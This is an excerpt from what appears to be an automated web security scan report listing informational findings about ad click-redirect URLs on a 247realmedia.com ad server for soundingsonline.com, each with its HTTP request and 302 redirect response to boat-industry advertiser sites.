<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.387. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.393. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:54:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:29:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:04:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
